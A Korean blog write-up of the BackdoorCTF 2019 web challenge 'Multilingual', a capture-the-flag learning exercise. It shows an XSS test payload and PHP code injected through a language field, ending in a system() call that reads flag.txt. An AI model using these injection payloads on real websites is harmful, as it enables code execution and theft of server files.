BackdoorCTF 2019 - web Multilingual Write up

2019. 10. 27. 21:56Wargame/BackdoorCTF 2019

문제를 보기전 먼저 문제 설명을 봐보자.

문제 설명을 보면 flag.txt. 를 읽어야하는데

권한이 없다고 출력된다.

우선 문제 페이지를 보면 신문? 같은게 나와있고 언어를 조정할 수 있는것 같다.

일단 아래 here 링크를 클릭해보자.

위와같은 폼이 있는데 여기서 Language 에 기억할 수 있는 문자를 넣어놓고

xss 공격을 진행해 보았다.

<script>alert();</script>

그리고 메인페이지에서 Language 의 이름을 입력하니

이처럼 xss 공격이 성공적으로 먹힌 것을 볼 수 있다.

그렇다면 다음으로 시험해 볼 것은 php 코드가 실행되는지 확인해 보는것이다.

여기선

<?php

echo "<script>location.href='http://hack.bckdr.in:11339';</script>";

?>

을 입력하고 위의 기사로 들어가 주면 문제 메인페이지로 이동되는것을 보아 php 코드또한 정상적으로 작동하는것을 볼 수 있다.

 

이를 이용해서 system 함수를 이용해서 flag.txt. 를 출력해보자.

->

<?php

system("cat ./flag.txt");

?>

위의 코드를 이용한다면 flag.txt. 가 출력 될 것이다.

 

이 값을 sha256 으로 온라인 해쉬값을 생성해서 플래그를 제출해주자.

'Wargame > BackdoorCTF 2019' 카테고리의 다른 글

BackdoorCTF 2019 - web LOST Write up  (0) 2019.10.27
BackdoorCTF 2019 - web robot Write up  (0) 2019.10.27